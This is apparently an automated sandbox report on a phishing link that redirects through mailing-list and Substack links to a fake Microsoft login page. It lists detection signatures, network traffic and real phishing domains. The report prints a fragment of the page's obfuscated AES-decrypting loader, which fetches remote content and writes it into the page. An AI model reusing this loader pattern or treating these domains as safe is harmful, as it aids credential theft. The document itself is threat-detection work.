Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e

Overview

General Information

Sample URL:https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e
Analysis ID:1524306
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Yara detected HtmlPhish70
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 3484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2204,i,11409684658956308218,7678980179476139140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    7.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 7.4.pages.csv, type: HTML
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: window.location.href = atob(
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: window.location.href = atob(
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailMatcher: Template: microsoft matched
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#Matcher: Template: microsoft matched
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailMatcher: Template: captcha matched
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: Number of links: 0
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: Number of links: 0
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: Total embedded image size: 45687
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: Total embedded image size: 45687
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: Title: Account Log-in does not match URL
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: Title: Account Log-in does not match URL
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: async functionjaggedly(earth) { var {a,b,c,d} = json.parse(earth); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize:64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async() =>{ document.write(await jaggedly(await (awaitfetch(await jaggedly(atob(`eyjhijoiztg3zjjjrzzuxc8rshuwvfhsr25pehhhkythbhdqvwerz2n3zmiztw5mk009iiwiyyi6ijvjnjg3yjrmngmxnwqxytqxmjczndhjnmuwzdzhmmqwiiwiyii6ijc5nmyxowzlmmrizjy1mtuxmgfmmzmwmge4ndhlodi5nzk1mdjhnta3zwe5ztu1ntk4zdm2mgvknda1ntzhndu0oguwmzzkotviyzk4zgvmnja2zmqxyjk5zdc3yty2njmzytm5mzqwmwfjotu4ztjiytmxngnmnzq1ndewotywnjjhmtblndnkote5mtm5ytjjogjhmjy5zgq5m2jhmjy0mtbkndrmmdrlngm0nte5zwviowy5mjazzmm5mjc4njixnzuznzhhngqymzjmzdc0odbjzmjlzmzlodcxytqwnwexmtg2yjcwmge2nwi4mmexnwrmyme5yjzhyji2ndy4oge2zdc3nju0zdmxntrhmme0ywjmyjiymmfmmzmwmtrmnju2nwqzmwqynjgwotllm2m4ytvmmmrmmwm5nja1ntvmmwq5n2e2ogqzztjimgrjogrkmtcym...
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: No favicon
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: No favicon
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: No favicon
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: No favicon
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: No <meta name="author".. found
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: No <meta name="author".. found
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailHTTP Parser: No <meta name="copyright".. found
        Source: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email#HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.4:60329 -> 1.1.1.1:53
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /redirect/cba7f617-bad8-4206-a765-e1d0a6aa1814?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY HTTP/1.1Host: link.sbstck.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /4pAtm/?utm_source=substack&utm_medium=email HTTP/1.1Host: mousefarte.proConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mousefarte.pro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mousefarte.pro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mousefarte.pro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5a5a47e0643e9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5a5a47e0643e9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mousefarte.proConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc5a5a47e0643e9/1727882120479/XRkbRnieRFP1t3h HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cc5a5a47e0643e9/1727882120481/a8b23fbbbed7aafb8eb8f06a907e5c7c0eb514aead0ab533f1c0e3be569a2a1d/e77zs-l3pybZIXP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc5a5a47e0643e9/1727882120479/XRkbRnieRFP1t3h HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mousefarte.pro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /4pAtm/, HTTP/1.1Host: mousefarte.proConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mousefarte.pro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: kushbluntzgi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /4pAtm/, HTTP/1.1Host: mousefarte.proConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=emailAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
        Source: global trafficHTTP traffic detected: GET /?utm_source=substack&utm_medium=email HTTP/1.1Host: savniofode.za.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: tqaun.us12.list-manage.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: link.sbstck.com
        Source: global trafficDNS traffic detected: DNS query: savniofode.za.com
        Source: global trafficDNS traffic detected: DNS query: mousefarte.pro
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: kushbluntzgi.ru
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
